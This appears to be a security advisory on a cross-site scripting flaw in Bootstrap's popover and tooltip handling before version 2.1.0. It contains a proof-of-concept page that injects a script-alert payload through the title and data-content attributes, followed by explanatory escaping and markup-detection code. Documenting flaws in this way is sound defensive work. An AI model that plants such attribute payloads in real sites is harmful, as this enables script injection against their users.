Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade twitter/bootstrap to version 2.1.0 or higher.
twitter/bootstrap is a
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The html option for popovers/tooltips is unescaped when grabbed with jQuery's .attr() method. This may allow attackers to exploit this vulnerability.
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Bootstrap Example</title>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <link href="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/css/bootstrap-combined.min.css" rel="stylesheet" integrity="sha384-G87n9a15LEsz+OvKCr10ldEbckfbCpr2gjYnZgCiKiwH0p/If1QkSURCTzubbt19" crossorigin="anonymous" />
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/js/bootstrap.min.js" integrity="sha384-2sVosMIQw67h8RBCTmE20BSl9j66nWwbH+2W/CKr8celILSNnEfJnJv2PKCdet3I" crossorigin="anonymous"></script>
</head>
<body>
  <div class="container">
    <h3>Popover Example</h3>
    <a href="#" data-toggle="popover" title="<script>alert('XSS')</script>" data-content="<script>alert('XSS')</script>">Toggle popover</a>
  </div>
  <script>
    $(document).ready(function() {
      $('[data-toggle="popover"]').popover();
    });
  </script>
</body>
</html>
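The example below is added here and is not the advisory's PoC nor Bootstrap's own code: it is a stand-alone model of the difference between filling a popover body like jQuery's .html() (markup in the title/data-content attribute is parsed) and like .text() (the same string is rendered literally), plus a check that flags markup in those attributes when auditing templates. It assumes the hypothetical names renderPopoverInner, popoverFromAttributes and containsMarkup and runs under node with no DOM or jQuery.

```javascript
// Escape the five characters that matter in HTML text and attribute context.
// This is what a .text()-style insertion guarantees and a .html()-style one does not.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Simplified stand-in (assumption: not Bootstrap's code) for filling the
// popover's inner element. html=true behaves like .html(value): tags in the
// attribute become live markup. html=false behaves like .text(value): the
// same string is shown as literal characters and cannot create elements.
function renderPopoverInner(attrValue, opts) {
  const html = Boolean(opts && opts.html === true);
  return html ? String(attrValue) : escapeHtml(attrValue);
}

// Build the strings a popover would show for one element's attributes
// (attrs mirrors what .attr('title') / .attr('data-content') would return).
function popoverFromAttributes(attrs, opts) {
  return {
    title: renderPopoverInner(attrs.title || '', opts),
    content: renderPopoverInner(attrs['data-content'] || '', opts),
  };
}

// Audit aid: does a title/data-content value contain anything the HTML parser
// would treat as a tag or entity? Use it when reviewing templates that place
// user-controlled data into these attributes on a pre-2.1.0 Bootstrap.
function containsMarkup(value) {
  return /<[a-zA-Z!\/]|&#?\w+;/.test(String(value));
}

// Constructed sample: the attribute values used by the PoC element above.
const pocAttrs = {
  title: "<script>alert('XSS')</script>",
  'data-content': "<script>alert('XSS')</script>",
};

// Demo when run directly: the html=true path reproduces the attribute
// verbatim; the html=false path yields an inert, escaped string.
console.log('html: true ', popoverFromAttributes(pocAttrs, { html: true }));
console.log('html: false', popoverFromAttributes(pocAttrs, { html: false }));
console.log('markup found in attributes:', containsMarkup(pocAttrs.title));
```

When markup genuinely has to be rendered inside a popover, pass it through a vetted HTML sanitizer (for example DOMPurify) before it reaches the element rather than extending escapeHtml into an allowlist by hand.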